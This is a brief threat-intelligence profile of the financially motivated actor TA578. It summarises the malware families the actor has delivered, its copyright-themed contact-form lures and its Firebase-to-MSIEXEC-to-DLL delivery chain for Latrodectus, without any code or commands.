TA578

TA578 is a financially motivated threat actor tracked by Proofpoint since May 2020. It is associated with email- and web-based initial access activity and has delivered multiple malware families over time, including Ursnif, IcedID, KPOT Stealer, Buer Loader, BazaLoader, Bumblebee, Cobalt Strike, and more recently Latrodectus. Proofpoint reported TA578 delivering IcedID since June 2020 and noted recurring use of "stolen images" / copyright-violation themes. The actor has also been described in reporting as associated with botnet-based operations involving SSLoad and Bumblebee malware. TA578 commonly uses social-engineering lures and delivery chains centered on malicious links and scripts. Reported tradecraft includes abuse of website contact forms to initiate conversations with targets, often impersonating companies and sending legal threats about alleged copyright infringement. TA578 has placed malicious links in contact forms on victim sites to redirect users to malware downloads. In observed campaigns, victims were redirected to personalized landing pages that downloaded JavaScript from Google Firebase; the JavaScript then invoked MSIEXEC to run an MSI from a WebDAV share, which executed a bundled DLL to launch Latrodectus. TA578 has also used JavaScript files in malware execution chains and has hosted malicious scripts on Google Firebase. Since mid-January 2024, Latrodectus has been almost exclusively distributed by TA578 in observed campaigns. Proofpoint observed TA578 delivering Latrodectus via a DanaBot infection in December 2023, and later via contact-form and copyright-themed lures in February 2024. Reporting describes TA578 as one of the initial access brokers associated with Latrodectus campaigns. No additional aliases or sub-groups for TA578 are directly supported in the provided content.